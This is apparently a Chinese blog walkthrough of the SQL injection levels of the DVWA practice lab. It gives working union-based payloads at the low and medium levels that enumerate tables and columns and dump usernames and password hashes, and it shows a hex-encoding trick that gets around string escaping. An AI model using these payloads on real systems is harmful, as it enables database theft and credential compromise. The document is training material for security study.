[大数据]DVWA靶场通关（SQL注入）

SQL Injection（SQL注入）概念

就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。

SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。

手工注入常规思路

1.判断是否存在注入，注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

low

（1）判断是否存在sql注入，输入1'，返回错误

判断存在sql注入：当输入1'，返回错误，说明页面没有对1'进行过滤，即攻击者可以对数据库进行操作。

?? 输入1，回显正常，确认存在sql注入。

?（2）猜解SQL查询语句中的字段数

1' order by 2#

1' order by 3#

?

（3）确定回显位置（为第二个位置）

1' union select 1,2#

?(4)获取当前数据库。dvwa

1' union select 1,database()#

（5）获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

?

(6) 获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

?

(7)获取字段中的数据

1' union select user,password from users#

Medium

在level为medium时，网页通过下拉表单的格式提交数据。

从页面源代码中可以发现，代码不是get型注入，应该是把提交的数据存放到post数据中了。

?这时需要对其注入sql语句，则最好采用火狐浏览器所带有的插件hacker。

（1）构造Post data ：id=4&Submit=Submit。网页可以回显id=4的字段。

（2）猜解SQL查询语句中的字段数。

id=1 order by 2 &Submit=Submit //正常回显
id=1 order by 3 &Submit=Submit  //报错

(3)确定回显位置。回显位置为2。

id=1 union select 1,2 &Submit=Submit

（4）获取数据库名

id=1 union select 1,database() &Submit=Submit

（5）获取表名。

id=4 union select 1, group_concat(table_name) from information_scheme.table where table_schema = database()&Submit=Submit

?

该方法行不通，需要转变思路，利用burpsuite抓包，修改数据包内容，得到网页的回显。

在下图详细介绍了，burpsuite的修改数据包的内容，所得到网页的回显。

标记为1：更改GET==>POST

标记为2：增加 Content-Type: application/x-www-form-urlencoded，这条记录若不添加，会造成网页没有任何回显。

标记为3：数据包内容（即构造的SQL语句）

标记为4：回显的内容。

?后续SQL注入的步骤修改的地方为标记3。

对于数据库5.0以上的版本，存在information_schema表，这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名，数据库的表等信息；

查找数据库DVWA中有多少表。

id=2 union select 1,table_name from information_schema.tables where table_schema=(select database())#&Submit=Submit

?回显内容:数据库dvwa中存在两个表user和guestbook

查看表中的字段

id=3 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

网页返回错误

?查看源代码

?$id?=?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],?$id); //mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

因此当SQL语句中‘’，会直接让其转义，并不能对数据库的内容进行修改。所以需要对users进行编码；user转换为16进制为0x7573657273。

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&Submit=Submit

?user表中的字段有user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

?获取关键数据

最后得到的密码是16进制数据，我们需要将其处理后使用。

id=1 union select user,password from users#&Submit=Submit

?

High

SQLMAP

实验需要再linux系统中实现，因此，首先需要再linux系统中进入DVWA平台，在浏览器中输入：http://靶机IP地址/DVWA-master/setup.php.